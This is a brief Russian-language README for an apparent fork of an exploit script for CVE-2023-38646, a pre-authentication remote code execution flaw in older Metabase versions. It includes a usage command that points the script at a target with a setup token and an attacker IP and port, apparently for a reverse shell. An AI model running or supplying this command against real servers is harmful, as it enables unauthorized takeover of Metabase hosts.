
CVE-2023-38646 RCE до аутентификации в Metabase
Форк kh4sh3i с удалением необходимости в Burp Collector.
CVE-2023-38646 (Pre-Auth RCE в Metabase):
Metabase с открытым исходным кодом до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с привилегиями сервера. Для эксплуатации аутентификация не требуется.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
Для получения дополнительной информации прочитайте эту статью.